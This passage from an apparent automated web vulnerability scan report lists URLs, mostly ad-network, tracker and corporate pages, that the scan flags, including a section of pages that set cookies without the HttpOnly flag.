10.145. http://rd.apmebf.com/w/get.media

10.146. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

10.147. http://rs.gwallet.com/r1/pixel/x960r=772053252

10.148. http://rt.legolas-media.com/lgrt

10.149. http://sales.liveperson.net/hc/54909046/

10.150. http://secure.adnxs.com/seg

10.151. http://segment-pixel.invitemedia.com/pixel

10.152. http://segment-pixel.invitemedia.com/set_partner_uid

10.153. http://segments.adap.tv/data

10.154. http://segments.adap.tv/data/

10.155. https://servicing.capitalone.com/c1/login.aspx

10.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet

10.157. http://sitelife.boston.com/ver1.0/Direct/Jsonp

10.158. http://social.msdn.microsoft.com/Search/en-US

10.159. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

10.160. http://sync.adap.tv/sync

10.161. http://sync.mathtag.com/sync/img

10.162. http://tags.bluekai.com/ids

10.163. http://tags.bluekai.com/site/2731

10.164. http://tags.bluekai.com/site/2751

10.165. http://tags.bluekai.com/site/365

10.166. http://uat.netmng.com/pixel/

10.167. http://user.lucidmedia.com/clicksense/user

10.168. http://user.lucidmedia.com/clicksense/user/browser

10.169. http://vap2den1.lijit.com/www/delivery/lg.php

10.170. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

10.171. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

10.172. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

10.173. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js

10.174. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

10.175. http://visualstudiogallery.msdn.microsoft.com/site/favorites

10.176. http://visualstudiogallery.msdn.microsoft.com/site/search

10.177. http://www.bing.com/fd/ls/l

10.178. http://www.bing.com/search

10.179. http://www.burstnet.com/enlightn/8117//3E06/

10.180. http://www.burstnet.com/enlightn/8171//99D2/

10.181. http://www.capitalone.com/autoloans/before-you-apply.php

10.182. http://www.capitalone.com/autoloans/redirect.php

10.183. http://www.capitalone.com/directbanking/

10.184. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

10.185. http://www.capitalone.com/redirect.php

10.186. http://www.capitalone.com/stylesheets/https-common/header.css

10.187. http://www.othersonline.com/partner/scripts/myyearbook/alice.js

10.188. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js

10.189. http://www.wtp101.com/pull_sync

11. Cookie without HttpOnly flag set

11.1. http://ads.adxpose.com/ads/ads.js

11.2. http://c.microsoft.com/trans_pixel.aspx

11.3. http://dg.specificclick.net/

11.4. http://event.adxpose.com/event.flow

11.5. http://games.myyearbook.com/

11.6. http://games.myyearbook.com/landing/pool

11.7. http://hipservice.live.com/gethip.srf

11.8. http://home.myyearbook.com/Countries

11.9. http://home.myyearbook.com/feed/giftFeedItems

11.10. http://home.myyearbook.com/feed/myMagFeedItems

11.11. http://home.myyearbook.com/feed/tvFeedItems

11.12. http://members.boston.com/reg/rdb.do

11.13. http://ots.optimize.webtrends.com/ots/ots/js-3.

11.14. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665

11.15. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5

11.16. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.17. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d
7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d

11.18. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.19. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.20. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.21. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.22. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.23. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.24. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.25. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.26. http://ots.optimize.webtrends.com/ots/ots/js-3. [URL truncated]

11.27. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc
0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3

11.28. http://pixel.everesttech.net/2368/gr

11.29. http://pixel1350.everesttech.net/1350/p

11.30. http://t.mookie1.com/t/v1/imp

11.31. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx

11.32. http://www.pages05.net/WTS/event.jpeg

11.33. http://www.seashepherd.org/

11.34. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

11.35. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp

11.36. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

11.37. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911

11.38. http://a.netmng.com/hic/

11.39. http://a.tribalfusion.com/j.ad

11.40. http://a1.interclick.com/ColDta.aspx

11.41. http://a1.interclick.com/getInPageJSProcess.aspx

11.42. http://ad.turn.com/server/ads.js

11.43. http://ad.turn.com/server/pixel.htm

11.44. http://ad.yieldmanager.com/pixel

11.45. http://ad.yieldmanager.com/unpixel

11.46. http://ads.adap.tv/beacons

11.47. http://ads.adap.tv/cookie

11.48. http://ads.pointroll.com/PortalServe/

11.49. http://ads.undertone.com/f

11.50. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

11.51. http://ak1.abmr.net/is/a.collective-media.net

11.52. http://ak1.abmr.net/is/showadsak.pubmatic.com

11.53. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php

11.54. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php

11.55. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php

11.56. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php

11.57. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php

11.58. http://ap.lijit.com/www/delivery/retarget.php

11.59. http://api.bizographics.com/v1/profile.json

11.60. http://api.bizographics.com/v1/profile.redirect

11.61. http://apr.lijit.com///www/delivery/ajs.php

11.62. http://ar.atwola.com/atd

11.63. http://ar.voicefive.com/bmx3/broker.pli

11.64. http://articleonepartners.app7.hubspot.com/salog.js.aspx

11.65. http://at.amgdgt.com/ads/

11.66. http://b.scorecardresearch.com/b

11.67. http://b.scorecardresearch.com/p

11.68. http://b.scorecardresearch.com/r

11.69. http://b.voicefive.com/b

11.70. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

11.71. http://bh.contextweb.com/bh/getuid

11.72. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

11.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.74. http://c.atdmt.com/c.gif

11.75. http://c.bing.com/c.gif

11.76. http://c.live.com/c.gif

11.77. http://ce.lijit.com/merge

11.78. http://cf.addthis.com/red/p.json

11.79. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

11.80. http://clk.atdmt.com/goiframe/222276744/331989646/direct

11.81. http://clk.atdmt.com/goiframe/223672189/334126009/direct

11.82. http://cms.quantserve.com/dpixel

11.83. http://code.msdn.microsoft.com/

11.84. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js

11.85. http://code.msdn.microsoft.com/site/upload

11.86. http://community.spiceworks.com/r/595

11.87. http://content.mkt51.net/lp/static/js/iMAWebCookie.js

11.88. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

11.89. http://cspix.media6degrees.com/orbserv/hbpix

11.90. http://d.101m3.com/afr.php

11.91. http://d.101m3.com/lg.php

11.92. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

11.93. http://forums.vostu.com/

11.94. http://forums.vostu.com/forums/41-Como-Jogar

11.95. http://greatpondsma.org/

11.96. http://home.live.com/search

11.97. http://home.live.com/search/

11.98. http://home.live.com/search/hip

11.99. http://i.w55c.net/ping_match.gif

11.100. http://idcs.interclick.com/Segment.aspx

11.101. http://image2.pubmatic.com/AdServer/Pug

11.102. http://image2.pubmatic.com/AdServer/Pug

11.103. http://image2.pubmatic.com/AdServer/Pug

11.104. http://images.apple.com/global/metrics/js/s_code_h.js

11.105. http://images.apple.com/global/nav/scripts/globalnav.js

11.106. http://images.apple.com/global/nav/styles/navigation.css

11.107. http://images.apple.com/global/scripts/apple_core.js

11.108. http://images.apple.com/global/scripts/browserdetect.js

11.109. http://images.apple.com/global/scripts/content_swap.js

11.110. http://images.apple.com/global/scripts/lib/event_mixins.js

11.111. http://images.apple.com/global/scripts/lib/prototype.js

11.112. http://images.apple.com/global/scripts/lib/scriptaculous.js

11.113. http://images.apple.com/global/scripts/overlay_panel.js

11.114. http://images.apple.com/global/scripts/promomanager.js

11.115. http://images.apple.com/global/scripts/search_decorator.js

11.116. http://images.apple.com/global/scripts/swap_view.js

11.117. http://images.apple.com/global/scripts/view_master_tracker.js

11.118. http://images.apple.com/global/styles/base.css

11.119. http://images.apple.com/macpro/scripts/pagenav.js

11.120. http://images.apple.com/macpro/scripts/performance.js

11.121. http://images.apple.com/metrics/scripts/s_code_h.js

11.122. http://images.apple.com/support/css/base_new.css

11.123. http://images.apple.com/support/css/global/nav/navigation.css

11.124. http://images.apple.com/support/css/suggest2.css

11.125. http://images.apple.com/support/css/support.css

11.126. http://images.apple.com/support/home/css/home2011.css

11.127. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js

11.128. http://images.apple.com/support/iknow/scripts/ACShortcuts.js

11.129. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js

11.130. http://images.apple.com/support/scripts/SCReporting.js

11.131. http://images.apple.com/support/scripts/module_decorator.js

11.132. http://images.apple.com/support/scripts/new_country.js

11.133. http://images.apple.com/support/scripts/new_support_coverage/cookies.js

11.134. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js

11.135. http://images.apple.com/support/scripts/new_support_coverage/functions.js

11.136. http://images.apple.com/support/scripts/psp_geos.js

11.137. http://images.apple.com/support/scripts/support.global.js

11.138. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js

11.139. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js

11.140. http://js.revsci.net/gateway/gw.js

11.141. http://leadback.advertising.com/adcedge/lb

11.142. http://legolas.nexac.com/lgalt

11.143. http://lifescript.us.intellitxt.com/intellitxt/front.asp

11.144. http://lm.trafficmp.com/clicksense/epic

11.145. http://load.exelator.com/load/

11.146. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif

11.147. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

11.148. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

11.149. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif

11.150. http://media.fastclick.net/w/get.media

11.151. http://media.trafficmp.com/a/js

11.152. http://media.trafficmp.com/a/js

11.153. http://msdn.microsoft.com/magazine/ee336135.aspx

11.154. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0

11.155. http://odb.outbrain.com/utils/get

11.156. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

11.157. http://p.brilig.com/contact/bct

11.158. http://pix04.revsci.net/A11149/a4/0/0/123.302

11.159. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.160. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.161. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js

11.162. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js

11.163. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js

11.164. http://pixel.33across.com/ps/

11.165. http://pixel.quantserve.com/pixel

11.166. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif

11.167. http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js

11.168. http://profile.live.com/Handlers/Plt.mvc

11.169. http://profile.live.com/favicon.ico

11.170. http://r.openx.net/set

11.171. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

11.172. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

11.173. http://rd.apmebf.com/w/get.media

11.174. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

11.175. http://rs.gwallet.com/r1/pixel/x960r=772053252

11.176. http://rt.legolas-media.com/lgrt

11.177. http://sales.liveperson.net/hc/54909046/

11.178. http://sales.liveperson.net/hc/54909046/

11.179. http://segment-pixel.invitemedia.com/pixel

11.180. http://segment-pixel.invitemedia.com/set_partner_uid

11.181. http://segments.adap.tv/data

11.182. http://segments.adap.tv/data/

11.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.184. http://sitelife.boston.com/ver1.0/Direct/Jsonp

11.185. http://sm6.sitemeter.com/js/counter.asp

11.186. http://social.msdn.microsoft.com/Search/en-US

11.187. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

11.188. http://sourceforge.net/projects/hoytllc-vcloud/

11.189. http://sync.adap.tv/sync

11.190. http://sync.mathtag.com/sync/img

11.191. http://t4.trackalyzer.com/trackalyze.asp

11.192. http://tags.bluekai.com/ids

11.193. http://tags.bluekai.com/site/2731

11.194. http://tags.bluekai.com/site/2751

11.195. http://tags.bluekai.com/site/365

11.196. http://trk.etrigue.com/track.php

11.197. http://uat.netmng.com/pixel/

11.198. http://user.lucidmedia.com/clicksense/user

11.199. http://user.lucidmedia.com/clicksense/user/browser

11.200. http://vap2den1.lijit.com/www/delivery/lg.php

11.201. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

11.202. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

11.203. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

11.204. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js

11.205. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

11.206. http://visualstudiogallery.msdn.microsoft.com/site/favorites

11.207. http://visualstudiogallery.msdn.microsoft.com/site/search

11.208. http://web2.checkm8.com/adam/detect

11.209. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

11.210. http://wow.curse.com/Themes/Common/v6/images/loading.gif

11.211. http://wow.curse.com/Themes/Common/v6/images/wow/bkg-box-label.png

11.212. http://wow.curse.com/Themes/Common/v6/styles/portals/wow.css

11.213. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css

11.214. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css.aspx

11.215. http://wow.curse.com/WebResource.axd

11.216. http://wow.curse.com/adserver/default.aspx

11.217. http://wow.curse.com/themes/common/v6/styles/browser/ie7.css

11.218. http://www.bing.com/fd/ls/l

11.219. http://www.bing.com/search

11.220. http://www.burstnet.com/enlightn/8117//3E06/

11.221. http://www.burstnet.com/enlightn/8171//99D2/

11.222. http://www.capitalone.com/autoloans/before-you-apply.php

11.223. http://www.capitalone.com/autoloans/redirect.php

11.224. http://www.capitalone.com/directbanking/

11.225. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

11.226. http://www.capitalone.com/redirect.php

11.227. http://www.capitalone.com/stylesheets/https-common/header.css

11.228. http://www.kosmix.com/flash/kxcd2.swf

